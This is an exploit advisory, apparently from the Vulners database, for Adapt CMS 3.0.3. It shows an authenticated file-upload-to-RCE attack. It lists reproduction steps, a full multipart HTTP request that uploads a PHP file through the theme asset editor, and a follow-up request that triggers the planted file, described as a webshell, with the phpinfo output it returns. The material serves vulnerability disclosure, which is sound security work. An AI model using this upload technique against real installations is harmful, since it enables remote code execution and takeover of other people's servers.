Vulners
Lucene search
📄 Adapt CMS 3.0.3 Remote Shell Upload
# Exploit Title: Authenticated File Upload to RCE - adaptcmsv3.0.3
# Date: 06/2025
# Exploit Author: Andrey Stoykov
# Version: 3.0.3
# Tested on: Debian 12
# Blog: https://msecureltd.blogspot.com/
Authenticated File Upload to RCE #1:
Steps to Reproduce:
1. Login as admin user and visit "System" > "Appearance" > "Themes" >
"Default" > "Theme Files" and choose "Add New File"
2. Select "Add File"
3. In the "File Contents" add the following payload "<?php phpinfo(); ?>"
4. Choose "File Extension" to be "php" and set "Folder Location" to "Images"
5. Upon uploading the file it would be available under the "img" directory
// HTTP POST request
POST /adaptcms/admin/themes/asset_add/Default HTTP/1.1
Host: 192.168.58.131
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:140.0)
Gecko/20100101 Firefox/140.0
[...]
[...]
------geckoformboundary648cea5cd97a776abc03a12296adaf90
Content-Disposition: form-data; name="data[Asset][filename]"; filename=""
Content-Type: application/octet-stream
------geckoformboundary648cea5cd97a776abc03a12296adaf90
Content-Disposition: form-data; name="data[Asset][content]"
<?php phpinfo(); ?>
------geckoformboundary648cea5cd97a776abc03a12296adaf90
Content-Disposition: form-data; name="data[Asset][file_extension]"
php
------geckoformboundary648cea5cd97a776abc03a12296adaf90
Content-Disposition: form-data; name="data[Asset][file_name]"
test
------geckoformboundary648cea5cd97a776abc03a12296adaf90
Content-Disposition: form-data; name="data[Asset][folder]"
img/
------geckoformboundary648cea5cd97a776abc03a12296adaf90
Content-Disposition: form-data; name="data[Asset][theme]"
[...]
// HTTP Response
HTTP/1.1 302 Found
Date: Fri, 30 May 2025 16:06:57 GMT
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev
Perl/v5.16.3
X-Powered-By: PHP/5.6.40
Location: http://192.168.58.131/adaptcms/admin/themes/edit/Default#assets
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
// HTTP Request triggering the webshell
GET /adaptcms/app/webroot/img/test.php HTTP/1.1
Host: 192.168.58.131
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:140.0)
Gecko/20100101 Firefox/140.0
[...]
// HTTP Response triggering the webshell
HTTP/1.1 200 OK
Date: Fri, 30 May 2025 16:15:36 GMT
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev
Perl/v5.16.3
X-Powered-By: PHP/5.6.40
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 102019
[...]
<h1 class="p">PHP Version 5.6.40</h1>
</td></tr>
</table>
<table>
<tr><td class="e">System </td><td class="v">Linux debian 6.1.0-32-amd64 #1
SMP PREEMPT_DYNAMIC Debian 6.1.129-1 (2025-03-06) x86_64 </td></tr>
<tr>
[...]Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
03 Jun 2025 00:00Current
7.5High risk
Vulners AI Score7.5